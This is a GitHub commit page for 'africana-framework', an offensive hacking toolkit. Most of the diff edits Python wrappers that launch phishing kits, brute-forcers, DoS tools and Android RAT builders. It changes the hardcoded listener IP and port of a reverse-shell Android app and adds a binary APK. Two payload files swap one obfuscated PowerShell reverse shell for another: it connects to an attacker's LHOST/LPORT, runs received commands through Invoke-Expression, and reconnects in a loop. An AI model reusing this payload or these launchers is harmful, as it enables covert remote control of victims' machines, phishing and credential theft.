Skip to content

Commit

Permalink
With great power comes great responsibility
Browse files Browse the repository at this point in the history
The africana-framework is a software designed for network & web hacking by automating as much stuff as possible to detect vulnerabilities on most common services and web technologies. It also has some wide range of penetration testing from internal network, Wi-Fi, system anonymity to web bug hunting. It's purely written for Good and not Evil
  • Loading branch information
r0jahsm0ntar1 committed Mar 27, 2024
1 parent be56d9b commit dc6d462
Show file tree
Hide file tree
Showing 15 changed files with 102 additions and 101 deletions.
1 change: 0 additions & 1 deletion src/core/langa.py
Original file line number Diff line number Diff line change
Expand Up @@ -293,7 +293,6 @@ def user_agree(self):
if covenant[0].lower() == "y":
with open("src/agreement/covenant.txt", "w") as filewrite:
filewrite.write("user accepted")
os.chdir("reports")
neo.one()
break
else:
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -16,12 +16,12 @@
.locals 1

.line 4
const-string v0, "192.168.1.4"
const-string v0, "192.168.117.128"

sput-object v0, Lcom/example/reverseshell2/config;->IP:Ljava/lang/String;

.line 5
const-string v0, "9001"
const-string v0, "9000"

sput-object v0, Lcom/example/reverseshell2/config;->port:Ljava/lang/String;

Expand Down
Binary file added src/externals/androrat/shepherd.apk
Binary file not shown.
File renamed without changes.
Original file line number Diff line number Diff line change
Expand Up @@ -25,28 +25,23 @@ class Payload:
'encode' : True
}

data = """do {
& ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |ForEach-Object{$_}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$($_)}| % {$_}) -Seconds 15
try{
$TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$_}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) Net.Sockets.TCPClient('*LHOST*', *LPORT*)
} catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $($_))})) |ForEach-Object{$_}|%{$_}| % {$($_)}) IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize |ForEach-Object{$($_)}|%{$($_)}| % {0}
$StreamWriter.Write($String + 'PS ' + (& ([string]::join('', ( (71,101,116,45,76,111,99,97,116,105,111,110) |ForEach-Object{$($_)}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$_})).Path + '> ')
$StreamWriter.Flush()
}
WriteToStream ''
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
$Output = try {
& ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) $Command 2>&1 |ForEach-Object{$($_)}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '')
} catch {
$_ |ForEach-Object{$_}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '')
}
WriteToStream ($Output)
}
$StreamWriter.Close()"""
data = """
do {
$g9mUZ1Vrvz = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$_}| % {$($_)}) $([char](25+83-25)+[char](115+121-115)+[char](48*115/48)+[char](14+116-14)+[char](67+101-67)+[char](14+109-14)+[char](77+46-77)+[char](15*78/15)+[char](47+101-47)+[char](0+116-0)+[char](89+46-89)+[char](68+83-68)+[char](0+111-0)+[char](15*99/15)+[char](55+107-55)+[char](80*101/80)+[char](52*116/52)+[char](98*115/98)+[char](29*46/29)+[char](72+84-72)+[char](0+67-0)+[char](90+80-90)+[char](0+67-0)+[char](23+108-23)+[char](117*105/117)+[char](32*101/32)+[char](11*110/11)+[char](35+116-35))('*LHOST*', *LPORT*)
$hPAMk4Q9lENeLgUT2XRtj8xJz = $g9mUZ1Vrvz.GetStream()
[byte[]] $DnFwvUAMP9p0qgLafT5idck = 0..65535 |%{$($_)}| & ([string]::join('', ( (70,111,114,69,97,99,104,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_}) { 0 }
while (($Nx1 = $hPAMk4Q9lENeLgUT2XRtj8xJz.Read($DnFwvUAMP9p0qgLafT5idck, 0, $DnFwvUAMP9p0qgLafT5idck.Length)) -ne 0) {
$7HsSUGdpYkriwFLqQhAl = (& ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$_}|%{ ( [char][int] $_)})) |%{$($_)}| % {$($_)}) -TypeName ([string]::join('', ( (83,121,115,116,101,109,46,84,101,120,116,46,65,83,67,73,73,69,110,99,111,100,105,110,103) |%{$_}|%{ ( [char][int] $_)})) |%{$_}| % {$_})).GetString($DnFwvUAMP9p0qgLafT5idck, 0, $Nx1)
$k7iqSJnb6 = (& (("-LaPUA2bEm3pk9tf01gvSqlrIG6BwNdjc4VZsYCuXR8Jey57oKMWxniTzFQhHOD")[24,53,19,48,12,44,0,8,52,11,23,44,36,36,54,48,53] -join '') ". { $7HsSUGdpYkriwFLqQhAl } 2>&1" |%{$($_)}| & ([string]::join('', ( (79,117,116,45,83,116,114,105,110,103) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_}))
$TS5bJYV10mLNBKzpEc = $k7iqSJnb6 + 'PS ' + (& (("IF6MLa5HJU30E7kGuvNSwpThj8Yl9ZDcxqz2obArmi-Pyd4WfVCKtnQOsR1gBeX")[15,61,52,42,4,36,31,5,52,41,36,53] -join '')).Path + '> '
$5fRrSIJ = ([text.encoding]::ASCII).GetBytes($TS5bJYV10mLNBKzpEc)
$hPAMk4Q9lENeLgUT2XRtj8xJz.Write($5fRrSIJ, 0, $5fRrSIJ.Length)
$hPAMk4Q9lENeLgUT2XRtj8xJz.Flush()
}
$g9mUZ1Vrvz.Close()
& ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |%{$($_)}|%{ ( [char][int] $($_))})) |%{$_}| % {$_}) -Seconds 15
} while ($true)
"""

Original file line number Diff line number Diff line change
Expand Up @@ -25,28 +25,23 @@ class Payload:
'encode' : True
}

data = """do {
& ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |ForEach-Object{$_}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$($_)}| % {$_}) -Seconds 15
try{
$TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$_}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) Net.Sockets.TCPClient('*LHOST*', *LPORT*)
} catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $($_))})) |ForEach-Object{$_}|%{$_}| % {$($_)}) IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize |ForEach-Object{$($_)}|%{$($_)}| % {0}
$StreamWriter.Write($String + 'PS ' + (& ([string]::join('', ( (71,101,116,45,76,111,99,97,116,105,111,110) |ForEach-Object{$($_)}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$_})).Path + '> ')
$StreamWriter.Flush()
}
WriteToStream ''
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
$Output = try {
& ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) $Command 2>&1 |ForEach-Object{$($_)}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '')
} catch {
$_ |ForEach-Object{$_}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '')
}
WriteToStream ($Output)
}
$StreamWriter.Close()"""
data = """
do {
$g9mUZ1Vrvz = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$_}| % {$($_)}) $([char](25+83-25)+[char](115+121-115)+[char](48*115/48)+[char](14+116-14)+[char](67+101-67)+[char](14+109-14)+[char](77+46-77)+[char](15*78/15)+[char](47+101-47)+[char](0+116-0)+[char](89+46-89)+[char](68+83-68)+[char](0+111-0)+[char](15*99/15)+[char](55+107-55)+[char](80*101/80)+[char](52*116/52)+[char](98*115/98)+[char](29*46/29)+[char](72+84-72)+[char](0+67-0)+[char](90+80-90)+[char](0+67-0)+[char](23+108-23)+[char](117*105/117)+[char](32*101/32)+[char](11*110/11)+[char](35+116-35))('*LHOST*', *LPORT*)
$hPAMk4Q9lENeLgUT2XRtj8xJz = $g9mUZ1Vrvz.GetStream()
[byte[]] $DnFwvUAMP9p0qgLafT5idck = 0..65535 |%{$($_)}| & ([string]::join('', ( (70,111,114,69,97,99,104,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_}) { 0 }
while (($Nx1 = $hPAMk4Q9lENeLgUT2XRtj8xJz.Read($DnFwvUAMP9p0qgLafT5idck, 0, $DnFwvUAMP9p0qgLafT5idck.Length)) -ne 0) {
$7HsSUGdpYkriwFLqQhAl = (& ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$_}|%{ ( [char][int] $_)})) |%{$($_)}| % {$($_)}) -TypeName ([string]::join('', ( (83,121,115,116,101,109,46,84,101,120,116,46,65,83,67,73,73,69,110,99,111,100,105,110,103) |%{$_}|%{ ( [char][int] $_)})) |%{$_}| % {$_})).GetString($DnFwvUAMP9p0qgLafT5idck, 0, $Nx1)
$k7iqSJnb6 = (& (("-LaPUA2bEm3pk9tf01gvSqlrIG6BwNdjc4VZsYCuXR8Jey57oKMWxniTzFQhHOD")[24,53,19,48,12,44,0,8,52,11,23,44,36,36,54,48,53] -join '') ". { $7HsSUGdpYkriwFLqQhAl } 2>&1" |%{$($_)}| & ([string]::join('', ( (79,117,116,45,83,116,114,105,110,103) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_}))
$TS5bJYV10mLNBKzpEc = $k7iqSJnb6 + 'PS ' + (& (("IF6MLa5HJU30E7kGuvNSwpThj8Yl9ZDcxqz2obArmi-Pyd4WfVCKtnQOsR1gBeX")[15,61,52,42,4,36,31,5,52,41,36,53] -join '')).Path + '> '
$5fRrSIJ = ([text.encoding]::ASCII).GetBytes($TS5bJYV10mLNBKzpEc)
$hPAMk4Q9lENeLgUT2XRtj8xJz.Write($5fRrSIJ, 0, $5fRrSIJ.Length)
$hPAMk4Q9lENeLgUT2XRtj8xJz.Flush()
}
$g9mUZ1Vrvz.Close()
& ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |%{$($_)}|%{ ( [char][int] $($_))})) |%{$_}| % {$_}) -Seconds 15
} while ($true)
"""

2 changes: 1 addition & 1 deletion src/externals/ufonet/core/json/stats.json
Original file line number Diff line number Diff line change
@@ -1 +1 @@
{"flying": "36", "missions": "3", "scanner": "0", "transferred": "12764", "max_chargo": 12772, "completed": "0", "loic": "2", "loris": "2", "ufosyn": "0", "spray": "0", "smurf": "0", "fraggle": "0", "xmas": "0", "ufoack": "0", "uforst": "0", "droper": "0", "overlap": "0", "pinger": "0", "ufoudp": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "sniper": "0", "crashed": "0"}
{"flying": "37", "missions": "3", "scanner": "0", "transferred": "12764", "max_chargo": 12772, "completed": "0", "loic": "2", "loris": "2", "ufosyn": "0", "spray": "0", "smurf": "0", "fraggle": "0", "xmas": "0", "ufoack": "0", "uforst": "0", "droper": "0", "overlap": "0", "pinger": "0", "ufoudp": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "sniper": "0", "crashed": "0"}
2 changes: 1 addition & 1 deletion src/guide/info.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ def __init__(self):
pass

def guide(self):
with open('./src/guide/guide.txt', 'r') as guide:
with open('src/guide/guide.txt', 'r') as guide:
for line in guide:
sys.stdout.write(line)
sys.stdout.flush()
Expand Down
2 changes: 1 addition & 1 deletion src/internal/scanner.py
Original file line number Diff line number Diff line change
Expand Up @@ -202,7 +202,7 @@ def packets_responder(self):

def kickthemout_dos(self):
os.system('clear')
process = os.system('cd ./src/externals/kickthemout; python3 ./kickthemout.py')
process = os.system('cd src/externals/kickthemout; python3 kickthemout.py')
return process

internal_scanner = Interna_Attack(host = '')
Expand Down
30 changes: 21 additions & 9 deletions src/kitchen/malware.py
Original file line number Diff line number Diff line change
@@ -1,21 +1,33 @@
import sys
import time
import socket
import subprocess
from src.core.banner import *
from src.core.bcolors import *

class generator(object):
def __init__(self):
pass
def get_local_ip(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP

def shellz(self):
os.system('clear')
process = subprocess.Popen('cd ./src/externals/shells/; bash shells.py', shell = True).wait()
process = subprocess.Popen('cd src/externals/shells/; bash shells.py', shell = True).wait()
return process

def blackjack(self):
a = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lport" + bcolors.GREEN + ")# " + bcolors.ENDC)
process = subprocess.Popen('cd ./src/externals/blackjack/; python3 BlackJack.py -s -n {0}'.format(a), shell = True).wait()
process = subprocess.Popen('cd src/externals/blackjack/; python3 BlackJack.py -s -n {0}'.format(a), shell = True).wait()
return process

def powerjoker(self):
Expand All @@ -24,12 +36,12 @@ def powerjoker(self):
ip = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lhost" + bcolors.GREEN + ")# " + bcolors.ENDC)
port = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "port" + bcolors.GREEN + ")# " + bcolors.ENDC)
os.system('clear')
process = subprocess.Popen('cd ./src/externals/joker/; python3 joker.py -l {0} -p {1}'.format(ip, port), shell = True).wait()
process = subprocess.Popen('cd src/externals/joker/; python3 joker.py -l {0} -p {1}'.format(ip, port), shell = True).wait()
return process

def meterpeter(self):
os.system('clear')
process = subprocess.Popen('cd ./src/externals/meterpeter/; pwsh meterpeter.ps1', shell = True).wait()
process = subprocess.Popen('cd src/externals/meterpeter/; pwsh meterpeter.ps1', shell = True).wait()
return process

def havoc(self):
Expand All @@ -40,19 +52,19 @@ def havoc(self):
def teardroid(self):
malware = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "output name" + bcolors.GREEN + ")# " + bcolors.ENDC)
os.system('clear')
process = subprocess.Popen('cd ./src/externals/Teardroid-phprat/; python3 Teardroid.py -b {0}'.format(malware), shell = True).wait()
process = subprocess.Popen('cd src/externals/Teardroid-phprat/; python3 Teardroid.py -b {0}'.format(malware), shell = True).wait()
return process

def androrat(self):
print("\n")
subprocess.Popen('ip addr', shell = True).wait()
ip = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lhost" + bcolors.GREEN + ")# " + bcolors.ENDC)
ip = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lhost" + bcolors.YELLOW + "(%s)" %(rat.get_local_ip()) + bcolors.GREEN + ")# " + bcolors.ENDC)
port = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lport" + bcolors.GREEN + ")# " + bcolors.ENDC)
malware = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "output name" + bcolors.GREEN + ")# " + bcolors.ENDC)
malware = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "give_name.of.output" + bcolors.GREEN + ")# " + bcolors.ENDC)

os.system('clear')
process = subprocess.Popen('cd ./src/externals/androrat/; python3 androRAT.py --build -i %s -p %s -o %s' %(ip, port, malware), shell = True).wait()
process = subprocess.Popen('cd ./src/externals/androrat/; python3 androRAT.py --shell -i %s -p %s' %(ip, port), shell = True).wait()
process = subprocess.Popen('cd src/externals/androrat/; python3 androRAT.py --build -i %s -p %s -o %s%s' %(ip, port, malware, ".apk"), shell = True).wait()
process = subprocess.Popen('cd src/externals/androrat/; python3 androRAT.py --shell -i %s -p %s' %(ip, port), shell = True).wait()
return process

rat = generator()
Expand Down
4 changes: 2 additions & 2 deletions src/passcrack/cracker.py
Original file line number Diff line number Diff line change
Expand Up @@ -106,7 +106,7 @@ def cyberbrute_all(host):
host = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework:" + bcolors.RED + "target" + bcolors.GREEN + ")# " + bcolors.ENDC)
os.system('clear')
print(bcolors.BLUE + "~>[ " + bcolors.RED + "Bruteforcing all services" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC)
process = subprocess.Popen('cd ./src/externals/cyberbrute; bash ./cyberbrute.sh %s' %(host), shell = True).wait()
process = subprocess.Popen('cd src/externals/cyberbrute; bash cyberbrute.sh %s' %(host), shell = True).wait()
print("\n")
return process

Expand All @@ -115,7 +115,7 @@ def hash_buster(self):
hashes = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework:" + bcolors.RED + "hashes" + bcolors.GREEN + ")# " + bcolors.ENDC)
os.system('clear')
print(bcolors.BLUE + "~>[ " + bcolors.RED + "Bruteforcing Hashes" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(hashes) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC)
process = subprocess.Popen('cd ./src/externals/hash-buster; python3 ./cracker.py -t 10 %s' %(hashes), shell = True).wait()
process = subprocess.Popen('cd src/externals/hash-buster; python3 cracker.py -t 10 %s' %(hashes), shell = True).wait()
print("\n")
return process

Expand Down
8 changes: 4 additions & 4 deletions src/phishing/phisher.py
Original file line number Diff line number Diff line change
Expand Up @@ -18,20 +18,20 @@ def phish_goodginx(self):
return process

def phish_setoolkit(self):
process = os.system('cd ./src/externals/set/; python3 setoolkit')
process = os.system('cd src/externals/set/; python3 setoolkit')
return process

def phish_anonphisher(self):
process = subprocess.Popen("cd ./src/externals/anonphisher; bash anonphisher.sh", shell = True).wait()
process = subprocess.Popen("cd src/externals/anonphisher; bash anonphisher.sh", shell = True).wait()
return process

def phish_zphisher(self):
process = subprocess.Popen("cd ./src/externals/AdvPhishing; bash AdvPhishing.sh", shell = True).wait()
process = subprocess.Popen("cd src/externals/AdvPhishing; bash AdvPhishing.sh", shell = True).wait()
time.sleep(0.03)
return process

def phish_cyberphish(self):
process = subprocess.Popen("cd ./src/externals/cyberphish; python3 cyberphish.py", shell = True).wait()
process = subprocess.Popen("cd src/externals/cyberphish; python3 cyberphish.py", shell = True).wait()
time.sleep(0.03)
return process

Expand Down
2 changes: 1 addition & 1 deletion src/scriptures/salvation.py
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ def __init__(self):
def gospel(self):
while True:
try:
with open('./src/scriptures/kjv.txt', 'r') as verses:
with open('src/scriptures/kjv.txt', 'r') as verses:
words = color() + verses.read()
for w in words:
sys.stdout.write(w)
Expand Down
6 changes: 3 additions & 3 deletions src/security/anonym.py
Original file line number Diff line number Diff line change
Expand Up @@ -31,15 +31,15 @@ def vanish_install(self):

def vanish_start(self):
os.system('clear')
subprocess.Popen(['cd ./src/externals/tor-vanish/; python3 vanisher.py -m'], shell = True).wait()
subprocess.Popen(['cd src/externals/tor-vanish/; python3 vanisher.py -m'], shell = True).wait()

def vanish_stop(self):
os.system('clear')
subprocess.Popen('cd ./src/externals/tor-vanish/; python3 vanisher.py -e', shell = True).wait()
subprocess.Popen('cd src/externals/tor-vanish/; python3 vanisher.py -e', shell = True).wait()

def checktor_status(self):
os.system('clear')
subprocess.Popen('cd ./src/externals/tor-vanish/; python3 vanisher.py -w', shell = True).wait()
subprocess.Popen('cd src/externals/tor-vanish/; python3 vanisher.py -w', shell = True).wait()

def chains_start(self):
os.system('clear')
Expand Down
Loading

0 comments on commit dc6d462

Please sign in to comment.